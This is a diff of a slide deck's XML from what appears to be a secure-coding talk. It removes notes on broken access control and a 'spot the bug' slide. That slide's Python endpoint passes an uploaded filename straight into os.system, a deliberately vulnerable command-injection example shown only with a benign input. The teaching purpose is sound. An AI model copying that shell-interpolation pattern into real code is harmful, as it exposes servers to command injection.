-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="109" name="Google Shape;109;g3ec891ba402_1_337:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># Now an invoice that isn't in your org reads as 404, even</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># though you passed the membership check. The authorization</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># follows the data, not the URL structure. The rule:</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># authorize the object you touch, not its parent.</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Drive home that the fix is to make the ownership relationship explicit in the query that fetches the item: AND </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>org_id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> = :org. The membership check and the item fetch have to agree on the same scope. A useful framing: any time a URL has nested ids (/parent/{a}/child/{b}), ask whether the code actually verifies child b belongs to parent a. Most of the time, when this bug exists, it doesn't. This is OWASP's #1 category (Broken Access Control) and the single most-reported bug class in bug bounties.</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="110" name="Google Shape;110;g3ec891ba402_1_337:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" idx="12"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
 <file path=ppt/notesSlides/notesSlide40.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
@@ -6892,7 +6171,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> block, then loop. Twelve or so lines. And it's not a toy - point the TOOLS list at the right functions and this same code will read your codebase, run your tests, edit files, grep, whatever you've given it functions for. The two slides together are smaller than one React component.</a:t>
+              <a:t> block, then loop. Twelve or so lines. And this isn't a toy version - point the TOOLS list at the right functions and this same code will read your codebase, run your tests, edit files, grep, whatever you've handed it functions for. The two slides together come out smaller than one React component.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -7050,7 +6329,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Run this live if at all possible. The visceral moment is watching the agent call tools, get answers, decide on the next call, and converge on the answer - ideally with a running printout showing each tool call as it happens. If the live demo is risky, fall back to a pre-recorded transcript and walk it line by line. Either way, the point is the same: the agent isn't doing anything you couldn't trace by hand, and it definitely isn't doing anything you don't have the code for.</a:t>
+              <a:t>Run this live if at all possible. The visceral moment is watching the agent call tools, get answers, decide on the next call, and converge on the answer - ideally with a running printout showing each tool call as it happens. If the live demo is risky, fall back to a pre-recorded transcript and walk it line by line. Either way the point is the same - everything the agent does is traceable by hand, and none of it happens without code you wrote sitting there to do it.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -25031,652 +24310,6 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
-          <a:srgbClr val="FFFFFF"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 93"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="94" name="Google Shape;94;g3ec891ba402_1_246"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="365760"/>
-            <a:ext cx="10728600" cy="585000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Spot the bug: the thumbnail maker</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="95" name="Google Shape;95;g3ec891ba402_1_246"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9601200" y="1188720"/>
-            <a:ext cx="1828800" cy="307800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="5B21B6"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>Python</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="96" name="Google Shape;96;g3ec891ba402_1_246"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="1463040"/>
-            <a:ext cx="10728600" cy="4937700"/>
-          </a:xfrm>
-          <a:prstGeom prst="roundRect">
-            <a:avLst>
-              <a:gd name="adj" fmla="val 16667"/>
-            </a:avLst>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="F0F0F4"/>
-          </a:solidFill>
-          <a:ln w="12700" cap="flat" cmpd="sng">
-            <a:solidFill>
-              <a:srgbClr val="EEEEF0"/>
-            </a:solidFill>
-            <a:prstDash val="solid"/>
-            <a:round/>
-            <a:headEnd type="none" w="sm" len="sm"/>
-            <a:tailEnd type="none" w="sm" len="sm"/>
-          </a:ln>
-          <a:effectLst>
-            <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
-              <a:srgbClr val="000000">
-                <a:alpha val="34900"/>
-              </a:srgbClr>
-            </a:outerShdw>
-          </a:effectLst>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:schemeClr val="dk1"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-              <a:ea typeface="Calibri"/>
-              <a:cs typeface="Calibri"/>
-              <a:sym typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="97" name="Google Shape;97;g3ec891ba402_1_246"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1005840" y="1645920"/>
-            <a:ext cx="10179900" cy="3889200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t># Generate a thumbnail by shelling out to ImageMagick's convert.</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t># Takes an uploaded file's name, runs convert on it.</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>@app.post("/thumbnail")</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>def make_thumbnail(</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    filename: str,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1700"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>user: User = Depends(current_user),</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>):</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    output = filename.replace(".png", "_thumb.png")</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    os.system(f"convert uploads/{filename} -resize 100x100 uploads/{output}")</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    return {"thumbnail": output}</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t># Normal input: filename = "</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>dachshund</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>.png"</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>#   -&gt; convert uploads/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>dachshund</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>.png -resize 100x100 uploads/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>dachshund</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>_thumb.png</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>#   -&gt; works fine</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
 <file path=ppt/slides/slide20.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -29333,832 +27966,6 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
